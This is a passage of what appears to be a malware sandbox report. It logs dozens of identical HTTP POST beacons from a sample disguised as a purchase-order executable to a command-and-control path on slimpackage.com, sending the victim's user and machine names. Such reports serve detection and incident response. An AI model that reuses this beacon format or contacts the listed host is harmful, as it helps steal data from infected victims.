                    Jan 14, 2022 07:15:18.518191099 CET1248OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:18.650015116 CET1249INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:17 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    30192.168.2.449804104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:08.825263977 CET1624OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:08.949115038 CET1625OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:09.082606077 CET1639INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:07 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    31192.168.2.449823104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:12.085515976 CET2197OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:12.209481001 CET2199OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:12.347671986 CET2200INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:11 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    32192.168.2.449833104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:14.147581100 CET2219OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:14.301525116 CET2219OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:14.442856073 CET2220INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:13 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    33192.168.2.449834104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:17.416397095 CET2221OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:17.540833950 CET2221OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:17.672099113 CET2221INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:16 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    34192.168.2.449835104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:20.386728048 CET2222OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:20.510426044 CET2222OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:20.641201019 CET2224INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:19 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    35192.168.2.449841104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:24.539316893 CET10035OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:24.661875010 CET10036OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:24.792671919 CET10036INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:23 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    36192.168.2.449842104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:28.261720896 CET10037OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:28.386477947 CET10037OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:28.518954039 CET10037INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:27 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    37192.168.2.449843104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:30.749545097 CET10038OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:30.872180939 CET10038OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:31.008444071 CET10039INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:29 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    38192.168.2.449845104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:33.019782066 CET10841OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:33.144319057 CET10841OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:33.277029037 CET10841INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:32 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    39192.168.2.449846104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:34.831557989 CET10842OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:34.956110001 CET10842OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:35.088538885 CET10843INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:33 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    4192.168.2.449769104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:19.695573092 CET1250OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:19.846723080 CET1250OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:20.016736984 CET1250INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:18 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    40192.168.2.449852104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:36.784149885 CET10855OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:36.908672094 CET10856OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:37.041826010 CET10856INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:35 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    41192.168.2.449857104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:38.818540096 CET10867OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:38.943881989 CET10870OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:39.078356028 CET10871INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:37 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    42192.168.2.449864104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:40.128746986 CET10882OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:40.274898052 CET10884OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:40.411902905 CET10885INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:39 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    43192.168.2.449871104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:41.470923901 CET10898OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:41.612869024 CET10900OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:41.745306969 CET10901INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:40 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    44192.168.2.449873104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:43.379060030 CET10901OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:43.544672012 CET10902OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:43.675276995 CET10902INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:42 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    45192.168.2.449875104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:46.514857054 CET10908OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:46.639029980 CET10908OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:46.773838043 CET10908INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:45 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    46192.168.2.449876104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:49.069116116 CET10909OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:49.194155931 CET10909OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:49.337191105 CET10910INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:48 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    47192.168.2.449877104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:51.061156988 CET10910OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:51.185406923 CET10911OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:51.340956926 CET10911INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:50 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    48192.168.2.449879104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:53.094090939 CET10916OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:53.252428055 CET10918OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:53.418189049 CET10919INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:52 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    49192.168.2.449882104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:55.310735941 CET10922OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:55.472043991 CET10922OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
